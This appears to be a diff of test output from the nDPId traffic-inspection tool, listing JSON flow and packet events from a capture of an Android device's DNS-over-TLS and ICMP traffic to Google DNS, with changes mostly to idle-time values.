+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1592552825926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825926,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8q2cAAHcGygEICAQEwKgBnwNVu6wOvAEKE7F4oqAS6yBkegAAAgQFZAQCCAp\/X4MU\/\/\/MwQEDAwg="} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1592552825927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552825927,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8xdcAAHYGrI0ICAgIwKgBnwNV2tjD\/e2fl7AEwaAS6yBjdQAAAgQFZAQCCApkDcpF\/\/\/MwQEDAwg="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1592552825928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825928,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0tGFAAEAGuA\/AqAGfCAgEBLusA1UTsXiiDrwBC4AQAVd8vQAAAQEICv\/\/zMV\/X4MU"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1592552825929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825929,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0yAJAAEAGoGrAqAGfCAgICNrYA1WXsATBw\/3toIAQAVd7uAAAAQEICv\/\/zMVkDcpF"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552826036,"flow_last_seen":1592552826036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552826036,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1592552826036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826036,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA80uBAAEAGmYjAqAGfCAgEBLuwA1WtLB4AAAAAAKAC\/\/8imQAAAgQFtAQCCAr\/\/8zgAAAAAAEDAwg="} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1592552826049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826049,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8wHkAAHcGtO8ICAQEwKgBnwNVu7B94BEWrSweAaAS6yCziAAAAgQFZAQCCAq0eUC+\/\/\/M4AEDAwg="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1592552826051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552826051,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA00uFAAEAGmY\/AqAGfCAgEBLuwA1WtLB4BfeARF4AQAVfLywAAAQEICv\/\/zOS0eUC+"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1592552827426,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827426,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl9BAAEAB0IHAqAGfCAgICAgA4JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1592552827440,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827440,"pkt":"ag\/ahpuQEBMx8Tl2CABFoABUAAAAAHEBdrIICAgIwKgBnwAA6JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1592552828402,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552828402,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl\/5AAEAB0FPAqAGfCAgICAgAgPEAAwABe23sXgAAAABJawcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552871852,"flow_last_seen":1592552871852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552871852,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1592552871852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552871852,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0V5sAAHYGHtYICAQEwKgBnwNVu2A7uJADhSLfzIARAX\/+2gAAAQEICuSDFST\/\/78G"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1592552871941,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAAoAABAAEAGbH3AqAGfCAgEBLtgA1WFIt\/MAAAAAFAEAAC96AAA"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552878549,"flow_last_seen":1592552878549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552878549,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1592552878549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878549,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8PO5AAEAGL3vAqAGfCAgEBLviA1WhETzJAAAAAKAC\/\/\/ccgAAAgQFtAQCCAoAAAAnAAAAAAEDAwg="} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1592552878562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878562,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8nAYAAHYG2mIICAQEwKgBnwNVu+J3bBxFoRE8yqAS6yB6VAAAAgQFZAQCCAo7E6h3AAAAJwEDAwg="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1592552878563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552878563,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0PO9AAEAGL4LAqAGfCAgEBLviA1WhETzKd2wcRoAQAVeSlgAAAQEICgAAACw7E6h3"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552871852,"flow_last_seen":1592552871852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552871852,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1592552871852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552871852,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0V5sAAHYGHtYICAQEwKgBnwNVu2A7uJADhSLfzIARAX\/+2gAAAQEICuSDFST\/\/78G"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1592552871941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1592552871941,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAAoAABAAEAGbH3AqAGfCAgEBLtgA1WFIt\/MAAAAAFAEAAC96AAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552878549,"flow_last_seen":1592552878549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552878549,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1592552878549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878549,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8PO5AAEAGL3vAqAGfCAgEBLviA1WhETzJAAAAAKAC\/\/\/ccgAAAgQFtAQCCAoAAAAnAAAAAAEDAwg="} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1592552878562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878562,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8nAYAAHYG2mIICAQEwKgBnwNVu+J3bBxFoRE8yqAS6yB6VAAAAgQFZAQCCAo7E6h3AAAAJwEDAwg="} 